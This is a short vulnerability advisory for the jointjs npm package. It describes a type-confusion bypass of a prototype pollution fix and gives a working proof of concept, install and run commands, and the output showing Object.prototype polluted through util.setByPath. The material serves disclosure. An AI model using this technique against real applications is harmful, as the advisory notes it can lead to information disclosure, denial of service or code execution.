jointjs
package is vulnerable to Prototype Pollution. A type confusion vulnerability can lead to a bypass of CVE-2020-28480 when the path components used in the path parameter are arrays. In particular, the condition key === "__proto__"
returns false if key is ["__proto__"]
. This is because the === operator returns always false when the type of the operands is different.
Create the following PoC file:
// poc.js
const jointjs = require("jointjs");
const obj = {};
console.log("Before : " + {}.polluted);
jointjs.util.setByPath(obj, [["__proto__"],'polluted'], 'Yes! Its Polluted',',');
console.log("After : " + {}.polluted);
Execute the following commands in the terminal:
npm i jointjs # Install affected module
node poc.js # Run the PoC
Check the Output:
Before : undefined
After : Yes! Its Polluted
It may lead to Information Disclosure/DoS/RCE.